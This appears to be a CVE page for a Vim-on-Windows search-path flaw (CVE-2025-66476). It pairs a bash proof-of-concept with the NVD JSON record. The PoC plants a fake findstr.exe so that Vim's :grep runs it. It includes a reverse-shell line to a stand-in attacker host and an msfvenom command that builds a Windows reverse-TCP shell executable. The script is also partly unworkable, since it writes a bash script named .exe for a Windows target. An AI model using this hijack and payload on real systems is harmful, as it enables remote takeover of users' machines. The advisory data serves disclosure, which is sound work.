CVE-2025-66476

#!/bin/bash # CVE-2025-66476 PoC - Malicious executable placement # This PoC demonstrates the uncontrolled search path vulnerability in Vim for Windows # Attack scenario: # 1. Attacker creates a malicious findstr.exe in a directory # 2. Victim opens any file in that directory with Vim # 3. Victim runs :grep command (which uses findstr internally) # 4. Vim executes the malicious findstr.exe instead of the system one echo "Creating malicious findstr.exe in current directory..." # Malicious payload - reverse shell or arbitrary command execution cat > findstr.exe << 'EOF' #!/bin/bash echo "Malicious findstr.exe executed!" # Attacker can execute any command here # Example: Reverse shell connection # /bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1 EOF chmod +x findstr.exe echo "PoC created. When victim runs :grep in Vim, the malicious findstr.exe will be executed." # For Windows target, create actual Windows executable: # Use msfvenom or similar to generate Windows payload: # msfvenom -p windows/shell_reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > findstr.exe

{"cve": {"id": "CVE-2025-66476", "sourceIdentifier": "[email protected]", "published": "2025-12-02T22:16:09.940", "lastModified": "2026-01-30T18:50:29.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.1.1947, an uncontrolled search path vulnerability on Windows allows Vim to execute malicious executables placed in the current working directory for the current edited file. On Windows, when using cmd.exe as a shell, Vim resolves external commands by searching the current working directory before system paths. When Vim invokes tools such as findstr for :grep, external commands or filters via :!, or compiler/:make commands, it may inadvertently run a malicious executable present in the same directory as the file being edited. The issue affects Vim for Windows prior to version 9.1.1947."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.1947", "matchCriteriaId": "7F415DD0-063B-4239-B760-A7327109D919"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/vim/vim/commit/083ec6d9a3b7b09006e0ce69ac802597d25", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vim/vim/releases/tag/v9.1.1947", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-g77q-xrww-p834", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/02/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}